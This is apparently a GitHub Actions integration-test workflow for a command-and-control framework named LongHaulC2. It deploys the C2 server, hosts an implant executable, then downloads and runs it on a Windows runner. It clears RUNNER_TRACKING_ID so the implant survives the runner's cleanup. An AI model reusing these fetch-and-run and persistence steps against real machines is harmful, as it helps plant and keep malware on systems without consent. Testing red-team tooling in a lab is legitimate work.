name: Integration Testing

# for testing deployment

on:
  push:
    #branches: [ "main" ] # commented out to test pushes
  pull_request:
    branches: [ "main" ]

jobs:

# server setup
  server-deployment:
    # goes by tag, not by name of runner duh
    runs-on: [self-hosted, Ubuntu]    
    steps:
    - name: Check out the code
      uses: actions/checkout@v4


    - name: Deploy
      run: |
        # Testing out deployment
        # Install make if not present and deploy
        echo "${{ secrets.SUDO_UBUNTU_RUNNER_PASSWORD }}" | sudo -S apt-get update -y
        echo "${{ secrets.SUDO_UBUNTU_RUNNER_PASSWORD }}" | sudo -S apt-get install -y make apache2
        echo "${{ secrets.SUDO_UBUNTU_RUNNER_PASSWORD }}" | sudo -S -E systemctl start apache2
        echo "${{ secrets.SUDO_UBUNTU_RUNNER_PASSWORD }}" | sudo -S -E make redeploy

        echo "Successfully deployed LongHaulC2"

    # build implant
    - name: Setup
      run: |
        make test


    # copy from temp to apache, and host there.
    - name: Stage
      run: |
        echo "${{ secrets.SUDO_UBUNTU_RUNNER_PASSWORD }}" | sudo -S -E mkdir -p /var/www/html
        echo "${{ secrets.SUDO_UBUNTU_RUNNER_PASSWORD }}" | sudo -S -E cp /tmp/pytest_implant.exe /var/www/html

  implant-deployment:
    # waits on server to finish
    needs: server-deployment
    runs-on: [self-hosted, Windows]    

    steps:
    - name: Get & Run Implant
      run: |
        # Pull implant
        Invoke-WebRequest http://10.0.1.170:80/pytest_implant.exe -OutFile C:\pytest_implant.exe
        # run implant - have to wrap in these so the runner doesn't kill it
        $env:RUNNER_TRACKING_ID = "0"
        $proc = Start-Process -FilePath "C:\pytest_implant.exe" -PassThru
        Write-Host "Started PID: $($proc.Id)"
        Start-Sleep -Seconds 2
        Get-Process -Id $proc.Id
        $env:RUNNER_TRACKING_ID = $null
# implant testing job here, that runs again on the linux box, and runs api commands and checks them, via pytests

  task_testing:
    needs: implant-deployment
    # goes by tag, not by name of runner duh
    runs-on: [self-hosted, Ubuntu]    
    steps:

    - name: Test Tasks
      run: |
        echo "${{ secrets.SUDO_UBUNTU_RUNNER_PASSWORD }}" | sudo -S -E make integration_test
        echo "All tasks tested successfully"
